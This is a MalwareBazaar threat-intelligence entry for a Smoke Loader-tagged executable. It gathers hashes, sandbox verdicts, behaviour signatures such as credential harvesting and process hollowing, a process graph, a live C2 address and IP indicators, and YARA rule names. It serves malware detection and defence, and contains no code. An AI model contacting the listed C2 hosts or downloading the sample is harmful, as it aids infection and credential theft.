MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Smoke Loader


Vendor detections: 13


Intelligence 13 IOCs YARA 17 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
SHA3-384 hash: 27b6d7640a965259d971ea6ea02e7f998203636ccf2b8b146f5e2fc68a0fb8861376b45f67fd21da9f98bef481b418e7
SHA1 hash: 67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74
MD5 hash: b2c17e4aaa1ab07e2be2c6e08120c7fe
humanhash: tennessee-shade-nitrogen-virginia
File name:wow.exe
Download: download sample
Signature Smoke Loader
Create hunting rule
File size:15'479'739 bytes
First seen:2025-01-27 07:18:34 UTC
Last seen:2025-03-20 08:46:28 UTC
File type:Executable exe
MIME type:application/x-dosexec
imphash a06f302f71edd380da3d5bf4a6d94ebd (5 x PythonStealer, 3 x XWorm, 3 x BlankGrabber)
ssdeep 393216:gOWd863huc1dQJlAoF3MnG3WaiVLedWmoNr/xHWgrHz:5893hr1dQJ3MGGZKUpT
TLSH T1ABF6339A7B680CDAE4DF2035C0D1E529E932FD911BA0DA1743E99D9B0D476C02D3EFA4
TrID 70.8% (.CPL) Windows Control Panel Item (generic) (57583/11/19)
12.9% (.EXE) Win64 Executable (generic) (10522/11/4)
6.2% (.EXE) Win16 NE executable (generic) (5038/12/1)
2.5% (.ICL) Windows Icons Library (generic) (2059/9)
2.4% (.EXE) OS/2 Executable (generic) (2029/13)
Magika pebin
File icon (PE):PE icon
dhash icon aebc385c4ce0e8f8 (10 x PythonStealer, 7 x RedLineStealer, 7 x DCRat)
Reporter JAMESWT_WT
Tags:107-174-231-211 5-253-59-205 booking exe Smoke Loader Spam-ITA

Intelligence

File Origin
# of uploads :
2
# of downloads :
454
Origin country :
IT IT
Vendor Threat Intelligence
Malware family:
xmrig
Create hunting rule
ID:
1
File name:
wow.exe
Verdict:
Malicious activity
Analysis date:
2024-12-17 20:17:17 UTC
Tags:
github loader python metasploit miner xmrig dcrat upx golang
Link:
https://app.any.run/tasks/f45444e9-0cde-429f-bcf2-355bcbc0ba9e

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.Win64.Malware-gen.28382.4214.UNOFFICIAL
Create hunting rule

Gathering data
Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a process
Creating a file in the %temp% subdirectories
Launching a service
Creating a window
Restart of the analyzed sample
Creating a file
DNS request
Connection attempt
Sending a custom TCP request
Connecting to a non-recommended domain
Sending an HTTP GET request
Сreating synchronization primitives
Creating a process from a recently created file
Creating a process with a hidden window
Using the Windows Management Instrumentation requests
Searching for the window
Searching for synchronization primitives
Launching the default Windows debugger (dwwin.exe)
Creating a file in the %AppData% directory
Connection attempt to an infection source
Unauthorized injection to a recently created process
Sending an HTTP GET request to an infection source
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
expand lolbin microsoft_visual_cc overlay packed packed packer_detected
Link:
https://www.filescan.io/uploads/67973367c61f1594ee68cf76/reports/b612fb62-d006-447e-b63c-beb0f8ff42ee/overview
Verdict:
Malicious
Labled as:
TrojanPSW_Win32_Mimikatz_oly
Link:
https://www.hybrid-analysis.com/sample/d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
Result
Verdict:
UNKNOWN
Verdict:
Unknown
Link:
https://analyze.intezer.com/analyses/67d39f3c-a12c-4e5a-86e1-07bf93a38863
Result
Threat name:
Amadey, GhostRat, GuLoader, LummaC Steal
Create hunting rule
Detection:
malicious
Classification:
phis.troj.spyw.expl.evad.mine
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1600177
Signature
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contain functionality to detect virtual machines
Creates / moves files in alternative data streams (ADS)
Creates an undocumented autostart registry key
Creates HTML files with .exe extension (expired dropper behavior)
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after checking volume information)
Found malware configuration
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Opens the same file many times (likely Sandbox evasion)
PE file has a writeable .text section
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Schedule system process
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
System process connects to network (likely due to code injection or exploit)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Amadey bot
Yara detected Generic Downloader
Yara detected GhostRat
Yara detected GuLoader
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
Yara detected XWorm
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1600177 Sample: wow.exe Startdate: 27/01/2025 Architecture: WINDOWS Score: 100 113 pastebin.com 2->113 115 urlhaus.abuse.ch 2->115 117 22 other IPs or domains 2->117 135 Suricata IDS alerts for network traffic 2->135 137 Found malware configuration 2->137 139 Malicious sample detected (through community Yara rule) 2->139 143 26 other signatures 2->143 11 wow.exe 93 2->11         started        15 vapo.exe 2->15         started        17 OpenWith.exe 15 2->17         started        19 GameBarPresenceWriter.exe 2->19         started        signatures3 141 Connects to a pastebin service (likely for C&C) 113->141 process4 file5 105 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 11->105 dropped 107 C:\Users\user\AppData\...\win32evtlog.pyd, PE32+ 11->107 dropped 109 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 11->109 dropped 111 30 other files (28 malicious) 11->111 dropped 171 Creates HTML files with .exe extension (expired dropper behavior) 11->171 173 Found pyInstaller with non standard icon 11->173 21 wow.exe 2 49 11->21         started        26 conhost.exe 11->26         started        175 Multi AV Scanner detection for dropped file 15->175 signatures6 process7 dnsIp8 121 5.252.155.72, 49787, 80 WORLDSTREAMNL Russian Federation 21->121 123 121.127.231.160, 49780, 80 SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong Hong Kong 21->123 125 53 other IPs or domains 21->125 91 C:\Users\user\Downloads\haus\vapo.exe, PE32 21->91 dropped 93 C:\Users\user\Downloads\haus\traf.exe, PE32 21->93 dropped 95 C:\Users\user\Downloads\haus\sel1.exe, PE32 21->95 dropped 97 10 other malicious files 21->97 dropped 145 Found Tor onion address 21->145 147 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->147 28 sel1.exe 21->28         started        31 conhost.exe 21->31         started        35 amada2.exe 21->35         started        37 10 other processes 21->37 file9 signatures10 process11 dnsIp12 177 Multi AV Scanner detection for dropped file 28->177 179 Found evasive API chain (may stop execution after checking volume information) 28->179 181 Contain functionality to detect virtual machines 28->181 193 2 other signatures 28->193 39 svchost.exe 28->39         started        127 pastebin.com 104.20.4.235 CLOUDFLARENETUS United States 31->127 83 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 31->83 dropped 85 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 31->85 dropped 183 Sample is not signed and drops a device driver 31->183 43 cmd.exe 31->43         started        45 cmd.exe 31->45         started        47 cmd.exe 31->47         started        87 C:\ProgramData\1be588a5b7\gdsun.exe, PE32 35->87 dropped 185 Creates / moves files in alternative data streams (ADS) 35->185 49 gdsun.exe 35->49         started        89 C:\Users\user\AppData\Roaming\vapo.exe, PE32 37->89 dropped 187 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->187 189 Suspicious powershell command line found 37->189 191 Wscript starts Powershell (via cmd or directly) 37->191 195 3 other signatures 37->195 51 powershell.exe 37->51         started        54 powershell.exe 37->54         started        56 powershell.exe 37->56         started        58 7 other processes 37->58 file13 signatures14 process15 dnsIp16 99 C:\Users\user\AppData\Roaming743A7.exe, PE32 39->99 dropped 149 System process connects to network (likely due to code injection or exploit) 39->149 151 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->151 153 Creates an undocumented autostart registry key 39->153 169 5 other signatures 39->169 60 WerFault.exe 39->60         started        155 Wscript starts Powershell (via cmd or directly) 43->155 157 Encrypted powershell cmdline option found 43->157 73 2 other processes 43->73 75 2 other processes 45->75 62 conhost.exe 47->62         started        159 Antivirus detection for dropped file 49->159 161 Multi AV Scanner detection for dropped file 49->161 163 Machine Learning detection for dropped file 49->163 165 Opens the same file many times (likely Sandbox evasion) 49->165 64 reg.exe 49->64         started        119 filedn.eu 45.131.244.47 PCLOUDLU Luxembourg 51->119 167 Found suspicious powershell code related to unpacking or dynamic code loading 51->167 67 conhost.exe 51->67         started        101 C:\ProgramData\1be588a5b7\T.exe, PE32 54->101 dropped 69 conhost.exe 54->69         started        103 C:\ProgramData\1be588a5b7nalib.exe, PE32 56->103 dropped 71 conhost.exe 56->71         started        77 5 other processes 58->77 file17 signatures18 process19 signatures20 129 Creates an undocumented autostart registry key 64->129 79 conhost.exe 64->79         started        131 Loading BitLocker PowerShell Module 73->131 133 Powershell drops PE file 73->133 81 WmiPrvSE.exe 73->81         started        process21
Score:
99%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d/
Threat name:
Win64.Trojan.Remcos
Create hunting rule
Status:
Malicious
First seen:
2024-12-17 20:21:49 UTC
File Type:
PE+ (Exe)
Extracted files:
1313
AV detection:
13 of 38 (34.21%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=2zbh4wg7ugul7nu7keguyoagynwlw76pvsbjqtfpzux7koldd4gq._file
Result
Malware family:
xworm
Create hunting rule
Score:
  10/10
Tags:
family:asyncrat family:xworm botnet:heg discovery execution persistence pyinstaller rat trojan
Link:
https://tria.ge/reports/250127-h5hh5sxlfs/
Behaviour
Checks processor information in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Checks computer location settings
Drops startup file
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
AsyncRat
Asyncrat family
Detect Xworm Payload
Xworm
Xworm family
Malware Config
C2 Extraction:
nowmnew.loseyourip.com:6606
Verdict:
Malicious
Tags:
js_nemucod_m_gen js_nemucod
YARA:
n/a
Link:
https://app.threat.zone/submission/0e3f92cf-86d4-4696-abea-8baf0a4708be
Unpacked files
SH256 hash:
d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
MD5 hash:
b2c17e4aaa1ab07e2be2c6e08120c7fe
SHA1 hash:
67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74
Link:
https://www.unpac.me/results/9a75b3e3-3807-40be-9cce-e2cc90facb77/
Malware family:
Mimikatz
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/d6427e58dfa1/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Borland
Create hunting rule
Author:malware-lu
Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:golang_bin_JCorn_CSC846
Create hunting rule
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:malware_shellcode_hash
Create hunting rule
Author:JPCERT/CC Incident Response Group
Description:detect shellcode api hash value
Rule name:MD5_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:pe_detect_tls_callbacks
Create hunting rule
Rule name:pe_no_import_table
Create hunting rule
Description:Detect pe file that no import table
Rule name:PyInstaller
Create hunting rule
Author:@bartblaze
Description:Identifies executable converted using PyInstaller. This rule by itself does NOT necessarily mean the detected file is malicious.
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Create hunting rule
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:upxHook
Create hunting rule
Author:@r3dbU7z
Description:Detect artifacts from 'upxHook' - modification of UPX packer
Reference:https://bazaar.abuse.ch/sample/6352be8aa5d8063673aa428c3807228c40505004320232a23d99ebd9ef48478a/
Rule name:UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
Create hunting rule
Author:malware-lu

File information

The table below shows additional information about this malware sample such as delivery method and external references.

BLint

The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_DLL_CHARACTERISTICSMissing dll Security Characteristics (FORCE_INTEGRITY)high
Reviews
IDCapabilitiesEvidence
AUTH_APIManipulates User AuthorizationADVAPI32.dll::ConvertSidToStringSidW
ADVAPI32.dll::ConvertStringSecurityDescriptorToSecurityDescriptorW
SECURITY_BASE_APIUses Security Base APIADVAPI32.dll::GetTokenInformation
WIN32_PROCESS_APICan Create Process and ThreadsKERNEL32.dll::CreateProcessW
ADVAPI32.dll::OpenProcessToken
KERNEL32.dll::CloseHandle
WIN_BASE_APIUses Win Base APIKERNEL32.dll::TerminateProcess
KERNEL32.dll::LoadLibraryExW
KERNEL32.dll::GetDriveTypeW
KERNEL32.dll::GetStartupInfoW
KERNEL32.dll::GetCommandLineW
KERNEL32.dll::GetCommandLineA
WIN_BASE_EXEC_APICan Execute other programsKERNEL32.dll::WriteConsoleW
KERNEL32.dll::ReadConsoleW
KERNEL32.dll::SetConsoleCtrlHandler
KERNEL32.dll::SetStdHandle
KERNEL32.dll::GetConsoleWindow
KERNEL32.dll::GetConsoleMode
KERNEL32.dll::GetConsoleOutputCP
WIN_BASE_IO_APICan Create FilesKERNEL32.dll::CreateDirectoryW
KERNEL32.dll::CreateFileW
KERNEL32.dll::DeleteFileW
KERNEL32.dll::FindFirstFileW
KERNEL32.dll::RemoveDirectoryW
KERNEL32.dll::SetDllDirectoryW
WIN_USER_APIPerforms GUI ActionsUSER32.dll::PeekMessageW
USER32.dll::CreateWindowExW

Comments